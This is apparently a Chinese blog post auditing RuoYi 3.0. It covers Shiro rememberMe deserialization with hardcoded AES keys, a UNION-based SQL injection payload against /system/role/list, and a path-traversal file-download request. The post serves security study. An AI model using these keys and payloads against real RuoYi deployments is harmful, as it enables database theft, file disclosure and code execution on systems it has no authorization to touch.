【代码审计】RuoYi-3.0 三处安全问题分析

目录

Shiro反序列化

SQL注入

任意文件下载


Shiro反序列化

看到pom.xml里有1.4.0的Shiro依赖

可以打Shiro反序列化

Shiro Remember Me 的生成机制,就是把用户信息序列化成字节,然后用AES加密,最后Base64编码,放到Cookie里。

详细拆解三步:

  1. 序列化: 将用户的登录信息(如用户名)通过 Java原生序列化 变成二进制字节流。

  2. 加密: 使用 AES-128-CBC 模式,配合一个 硬编码的默认密钥 (如 kPH+bIxk5D2deZiIxcaaaA==)对这个字节流进行加密。

  3. 编码: 将加密后的字节进行 Base64编码 ,最终得到 rememberMe Cookie的值。

硬编码了密钥,拿到密钥后即可用任意恶意序列化数据进行Remember Me字段构造

复制代码
fCq+/xW488hMTCD+cmJ3aQ==

直接一把梭了

SQL注入

Ruoyi操作数据库用的是MyBatis

全局搜${

${params.dataScope}可以被注入

全局搜selectRoleList

发现最终是被/system/role/list去调用

顾名思义这个接口功能点在这

params是个数组

我们可以这样传参

复制代码
roleName=111&roleKey=111&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and 1=2
union select 1,2,3,4,5,6,7,concat(0x7e,(select database()),0x7e),9&pageSize=10&pageNum=1&orderByColumn=roleSort&isAsc=asc

成功查询到数据库名为ry

任意文件下载

全局搜/download

逻辑很简单,就是接收一个可控的filename参数,然后对返回的文件名做一些随机化处理

将指定文件内容返回回来

payload:

复制代码
/common/download?filename=../../../../../../flag.txt
相关推荐
云烟成雨TD14 分钟前
Spring AI Alibaba 1.x 系列【5】ReactAgent 构建器深度源码解析
java·人工智能·spring
最初的↘那颗心18 分钟前
Agent 实战:构建第一个 Agent 与记忆系统设计
java·大模型·agent·spring ai·记忆系统
程序猿_极客19 分钟前
SpringBoot 三大参数注解详解:@RequestParam @RequestBody @PathVariable 区别及常用开发注解
java·spring boot·后端·面试八股文·springboot注释
小胖java24 分钟前
校园通衢公告枢纽系统
java·spring boot
Crazy________25 分钟前
docker4.8
java·开发语言·eureka
cch891829 分钟前
Laravel 2.x:早期框架的奠基之路
java·开发语言
李小枫1 小时前
webflux接收application/x-www-form-urlencoded参数
android·java·开发语言
网络安全许木1 小时前
自学渗透测试第12天(渗透测试流程与DVWA部署)
web安全·网络安全·渗透测试
派大星酷1 小时前
Cookie、Session、Token、JWT 原理 + 流程 + 区别 + 实战
java·网络